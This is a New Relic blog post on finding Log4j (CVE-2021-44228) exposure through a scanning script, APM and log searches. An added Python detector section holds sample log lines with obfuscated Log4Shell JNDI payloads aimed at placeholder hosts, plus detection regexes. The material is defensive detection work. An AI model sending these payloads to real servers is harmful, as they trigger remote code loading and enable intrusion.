This post focuses on how you can use New Relic to help you identify some of your systems that are vulnerable to the Log4j vulnerability CVE-2021-44228. As of December 14, 2021, we recommend upgrading Apache Log4j to version 2.16.0 as soon as possible.
New Relic is a product built by developers for developers, so when news broke of the Apache Log4j vulnerability, we immediately kicked off two internal discussions:
First, we initiated a security response process to investigate the security of our own systems. You can read more about that in Kymberlee Price's recent blog post.
Second, we asked ourselves “how can we help our customers investigate the security of their systems?” We’re pleased to report that New Relic can help you expedite your own response to the log4j incident in three ways, described below.
Announcing: NR-find-log-4j, an open-source log4j scanning script
This is a new open-source script we’ve just released to help anyone scan their New Relic-monitored services and identify where log4j-core is in use within their own systems.
More specifically, this script can scan your New Relic account(s) for Java services that report usage of log4j-core, and generate a manifest containing each suspect service with the version of log4j-core reported by New Relic APM.
Note that this script may generate false positives and false negatives, and doesn't provide a guarantee or proof of non-vulnerability. This script is intended to be one resource among the many you may use to assist with your own investigation and identification of potentially vulnerable systems.
Download the script from GitHub and use it to help identify potential application security risks
Using New Relic APM to identify at-risk agents or applications
New Relic’s APM Environment functionality can help you identify whether your agents or some of your applications are at risk because they include a vulnerable version of log4j. When viewing the jars loaded in the JVM runtime, you can see whether log4j-core 2.x is present and which version of the New Relic agent is in use, which helps your security response process pin down where log4j is used in your systems.
Using New Relic Log Management to identify attempted log4j exploits
You can use New Relic Log Management to search your existing log records for attempted exploits of the recent log4j security vulnerability. Your log records may show a known attempt to exploit this vulnerability and may be helpful in tracking down malicious actors within your services.
- First, select Logs in New Relic One.
- In the search bar Find logs where, enter "jndi:ldap".
- Select Query logs. Any logs that include jndi:ldap will be displayed.
Keep in mind that "jndi:ldap" only catches the most common form of the payload. Attackers also use other JNDI schemes (for example jndi:rmi and jndi:dns) and obfuscate the string with Log4j lookup syntax such as ${lower:j} or ${::-j}, so a broader search for "jndi" and a review of any results will reduce misses.
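The log search above matches the literal string jndi:ldap, but real exploit attempts frequently arrive percent-encoded inside HTTP request lines or wrapped in Log4j lookup syntax that hides the word "jndi". The following detector, added here as an example and not part of the original post or of any New Relic tooling, normalizes those evasions before matching so it goes beyond the single-string search in the text. The log lines are constructed for the example (IPs are from the 203.0.113.0/24 documentation range); the set of obfuscations it undoes (percent-encoding, ${lower:x}/${upper:x}, and the ${...:-x} default-value form) covers the common variants but is not exhaustive.

```python
import re
from urllib.parse import unquote

# Constructed sample log lines (not real traffic). Lines 1, 3, 4 and 5 carry
# exploit attempts in progressively more obfuscated forms; line 2 is benign.
SAMPLE_LOGS = [
    '203.0.113.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 612 "-" '
    '"${jndi:ldap://203.0.113.7:1389/a}"',
    '203.0.113.9 - - [10/Dec/2021:12:00:02 +0000] "GET /login HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Dec/2021:12:00:03 +0000] '
    '"GET /?x=${${lower:j}ndi:${lower:r}mi://203.0.113.7:1099/x} HTTP/1.1" 404 0',
    # Same idea, but the whole payload is percent-encoded in the request URI.
    '203.0.113.5 - - [10/Dec/2021:12:00:04 +0000] '
    '"GET /?x=%24%7B%24%7B%3A%3A-j%7Dndi%3Adns%3A%2F%2Fping.example.test%2Fa%7D HTTP/1.1" 404 0',
    'INFO  [http-nio-8080-exec-3] User agent: ${${env:NaN:-j}ndi:${::-l}daps://203.0.113.7/z}',
]

# Lookup forms attackers use to hide the literal string "jndi":
#   ${lower:j} -> j        ${upper:n} -> N
#   ${::-j}    -> j        ${env:NaN:-j} -> j   (Log4j ":-" default-value syntax)
_LOWER_UPPER = re.compile(r"\$\{\s*(lower|upper)\s*:\s*([^${}]*?)\s*\}", re.I)
_DEFAULT_VALUE = re.compile(r"\$\{[^${}]*?:-([^${}]*?)\}")

# After normalization everything is lowercase, so no re.I is needed here.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|http)\s*:")


def normalize(line: str, rounds: int = 10) -> str:
    """Undo percent-encoding and common Log4j lookup obfuscations.

    Inner-most lookups resolve first, and the substitution repeats until the
    string stops changing (bounded by `rounds` so hostile input cannot loop
    forever), so nested tricks like ${lower:${::-j}} collapse to "j".
    """
    text = unquote(unquote(line))  # double-decode: "%2524" -> "%24" -> "$"
    for _ in range(rounds):
        before = text
        text = _LOWER_UPPER.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            text,
        )
        text = _DEFAULT_VALUE.sub(lambda m: m.group(1), text)
        if text == before:
            break
    return text.lower()


def find_jndi(line: str):
    """Return the JNDI scheme ("ldap", "rmi", ...) found in the line, or None."""
    match = _JNDI.search(normalize(line))
    return match.group(1) if match else None


def scan(lines):
    """Return [(1-based line number, scheme)] for every line carrying a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, 1):
        scheme = find_jndi(line)
        if scheme:
            hits.append((number, scheme))
    return hits


if __name__ == "__main__":
    for number, scheme in scan(SAMPLE_LOGS):
        print(f"line {number}: jndi:{scheme} lookup detected")
```

A plain "jndi:ldap" search would flag only the first sample line; after normalization the detector also reports the rmi, dns and ldaps attempts. The dns scheme matters in practice because it is used for callback-based scanning that confirms a host is vulnerable without delivering a payload, so it is worth reviewing even though it does not by itself lead to code execution.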
We hope these three capabilities will help you and your organization investigate and manage any security risks presented by the log4j CVE-2021-44228 vulnerability.
To use the open-source NR-find-log-4j script and explore other capabilities, sign up for a forever free New Relic account to get started with our product.
The views expressed on this blog are those of the author and do not necessarily reflect the views of New Relic. Any solutions offered by the author are environment-specific and not part of the commercial solutions or support offered by New Relic. Please join us exclusively at the Explorers Hub (discuss.newrelic.com) for questions and support related to this blog post. This blog may contain links to content on third-party sites. By providing such links, New Relic does not adopt, guarantee, approve or endorse the information, views or products available on such sites.